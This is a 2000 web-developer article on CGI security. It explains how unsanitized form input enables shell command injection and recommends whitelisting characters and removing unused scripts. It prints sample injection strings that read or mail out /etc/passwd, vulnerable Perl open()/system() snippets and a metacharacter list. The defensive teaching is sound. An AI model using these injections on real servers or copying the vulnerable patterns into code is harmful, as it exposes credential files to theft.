WebDevelopersJournal.comTips on Web Page Design, HTML and Graphics
SITE SEARCH
Newsletters
HTML (M-F) Text (M,TH)



Jobs at webdeveloper.com

Resources By Subject
Technical
Graphical
Authoring
Business
WDJ resources
Archive

internet.com

internet.commerce


Developer Channel


Find a web host with:
CGI Access DB Support Telnet Access
NT Servers UNIX Servers



Semi-automatic?

JavaScript
JavaScript Helper:
Meet Paige Turner, the least geeky geek we've ever come across.

Variables and Operators Explained:
First of a three part guide to JavaScript basics.

Controlling Forms:
Enhance your HTML forms with a touch of JS.

DHTML:
Forget how it works, let's see some in action!

Whitepaper: Reduce Energy Costs & Go Green. Energy consumption is a critical issue for IT organizations today. Learn how to right-size your IT infrastructure through server consolidation & dynamic load balancing.

Watch Out For CGI Gangsters

by Kevin Townsend

CGI security

Think of it like this. Your server is your bank, where you keep all your valuables. The Internet and its browsers are the street, populated mostly by law abiding customers, plus a few dangerous gangsters. CGI provides the door between the street and the bank. You need to keep it open to let in customers, but not open wide enough to let the gangsters stroll in.
January 4, 2000

CGI remains the most common method of creating dynamic Web pages. It's also the most common means of attacking a Web server. The basic problem is that CGI programming is relatively easy and quick. It tempts companies into using staff who may be less experienced than those they assign to their mission critical applications; and it even seduces experienced programmers into being less careful than they should. But as commerce moves onto the Internet, CGI is itself becoming mission critical.

The term CGI has come to imply any program written to the CGI specification - but of course, CGI is just the specification, not the program. The program itself can be written in any of many different languages, with Perl and C being the most popular.

CGI provides the means of passing instructions from customers to server-based applications, which can then take the relevant action and send back the relevant information. On most occasions this will be perfectly legitimate: "please tell me how much I have in my account". But in some cases the instruction will come from the bad guys: "hand over the keys", or "destroy that account". As a CGI programmer, your task is to let in and serve the customers; but to defeat the attentions of the gangsters.

So where's the problem?
Most CGI accepts input from the user via the standard HTML Form. The genuine user enters what is required and presses the submit button. But a malicious user might add additional characters that can have undesirable effects. It's not a new or unknown problem. RFC1738, December 1994, has a list of what Berners-Lee terms 'unsafe characters'. He is specifically referring to URL constructions, but his observations hold for CGI applications too, especially as they often ask for URLs.

"The URL scheme does not in itself pose a security threat… (But) a URL-related security threat is that it is sometimes possible to construct a URL such that an attempt to perform a harmless idempotent operation such as the retrieval of the object will in fact cause a possibly damaging remote operation to occur…"

For example, a Form might ask for a URL with the intention of pointing the Browser to that URL. A malicious user could enter the URL but append the new line character '%0a' and thereby also request a copy of /etc/passwd from the server:

http://www.something.mil/cgi-bin/query?%0a/bin/cat%20/etc/passwd

It is such characters that provide much of CGI's insecurity. A user is invited to input a request which may be a data variable or a command into a field in a form on a Web page. This is then sent to the server, where it is extracted and passed to the application.

This should, of course, be fine - provided that the user has input what the application expects to receive. But a strength of some systems is their ability to process multiple commands on a single line. So, if the user enters the expected data, follows it with, say, a semi-colon (;) and then adds a destructive command, we have the potential for serious problems.

One oft-quoted example uses the scenario of a Perl and C mix (by no means uncommon) at the server. The HTML form asks the user to input his e-mail address. This is processed by a simple Perl routine:

$mail_to = &get_name_from_input; # read the user's mail address from the form
open (MAIL,"| /usr/lib/sendmail $mail_to");
print MAIL "To: $mailto\…

The malicious user may or may not know the code of this routine - but he tries his luck anyway, entering first a nonsense, meaningless address (or someone else's) and then

;mail me@realaddress.org</etc/passwd;

Use of the piped open() call in the Perl routine evaluates this as

/usr/lib/sendmail nonsense@notrealaddress.com; mail me@realaddress.org</etc/passwd

So the nonsense address gets what you intended to send, and me@realaddress.org gets the content of your password file.

This problem is not limited to piped open() commands. For example, a simple Perl script such as

system("/usr/bin/sendmail -t %s < %s", $mailto_address < $input_file");

looks innocuous enough but is vulnerable in exactly the same way. A semicolon allows the malicious user to request a copy of /etc/passwd (or whatever). Your CGI application has invited the bad guy in, and turned him loose on your server.

In general, any CGI script that contains a UNIX system() call with just a single argument will provide a doorway into the system. At such times the system forks a separate shell to handle the request; and when this happens, it's possible to append data to the input and generate unexpected results.

What's the solution?
The solution resolves around four fundamental rules:

1. Check your server and make sure that you haven't got any 'free' CGI scripts that you no longer use.

2. Trust nobody and nothing - but do it with a smile. The smile is easy; it's how you design your Web page interface. The good-guy users will never know that you have built distrust into the application itself.

3. Don't be lazy. Take all the necessary steps to sanitize the input.

4. And then use a commercial vulnerability scanner.

Take the first rule. It's surprising how often webmasters download CGI scripts and then leave them lying around. You may not even be aware of them. They could have been put there by your predecessor. And many have vulnerabilities.

The Internet Auditing Project run in 1998 and published earlier this year (using a scanner called BASS) looked for 18 well known CGI vulnerabilities. We won't go into details, but to illustrate the point, consider COUNT.CGI (one of the most widely used Web page access counters). CERT released its warning advisory in November 1997 and the author rapidly produced a new version addressing the issue. But in the summer of 1999, The Internet Auditing Project still found 86,165 servers with the compromised program.

The second and third rules go together. The third, sanitize all user input, is necessary because of the second, trust nobody.

Sanitizing user input
The problem is caused by the malicious user's ability to include metacharacters in the input. Since you don't know when (rather than just 'if') this will happen, you need to sanitize all input all the time.

There are two approaches. You can disallow all metacharacters; or you can specifically allow acceptable characters. The first seems to be the obvious choice since it's a single operation and can save time. But there are problems.

The WWW Security FAQ defines metacharacters as:

&;`'\"|*?~<>^()[]{}$\n\r

but then has to add the comment: "Notice that it contains the carriage return and newline characters, something that someone at NCSA forgot when he or she wrote the widely-distributed util.c library as an example of CGI scripting in C." That's the danger. You cannot be totally certain that you are covering all metacharacters for all shells for all time - or that other characters might not be found to create other problems.

And there's another problem.

.rain.forest.puppy has written an excellent (and worrying) paper on Perl/CGI problems. The author points out that the Perl escape code for these metacharacters is

s/([\&;\`'\\\|"*?~<>^\(\)\[\]\{\}\$\n\r])/\\$1/g;

and then adds that in all these backslashes, escaping the backslash itself is frequently omitted. So don't be lazy (Rule 3!); the best approach is to include acceptable rather than exclude unacceptable.

How? Well, given Perl's excellent regular expression handling and text manipulation capabilities, an easy and effective method is to change all unacceptable metacharacters into underscores:

$OK_CHARS='-a-zA-Z0-9_.@'; # A restrictive list of metacharacters
s/[^$OK_CHARS]/_/go;

This needs to be done for each input, and the OK characters may need to change dependant upon the type of input (a relevant RFC would be a good starting point).

But there is still one more character we need to exclude: the NUL. Perl allows NULs as data within a variable. C does not. In C it is a string delimiter. So, on a server that mixes Perl and C, it is just possible that you may have a vulnerability. If you exclude specific actions based on a particular string, the user could add a NUL effectively creating different strings for PERL and C; and potentially bypassing your exclusion. It could cause unexpected results - and unexpected results must be eliminated.

Let's finish with a reminder or our fundamental rules. Make sure you don't have any residual CGIs on your system; don't trust the input to be what you expect, and sanitize, sanitize, sanitize. Then use a commercial vulnerability scanner.

An Oxford graduate in English Language and Literature, Kevin Townsend has spent his adult career trying to reconcile the differences between Computer Language and English Literature. He specialises in writing about data security in general and the Internet in particular, and has been editor of various specialist security magazines.
Suits PonytailsPropheadsContact WDJDiscussWeb AudioSearch



JupiterOnlineMedia

internet.comearthweb.comDevx.commediabistro.comGraphics.com

Search:

Jupitermedia Corporation has two divisions: Jupiterimages and JupiterOnlineMedia

Jupitermedia Corporate Info


Legal Notices, Licensing, Reprints, & Permissions, Privacy Policy.

Advertise | Newsletters | Tech Jobs | Shopping | E-mail Offers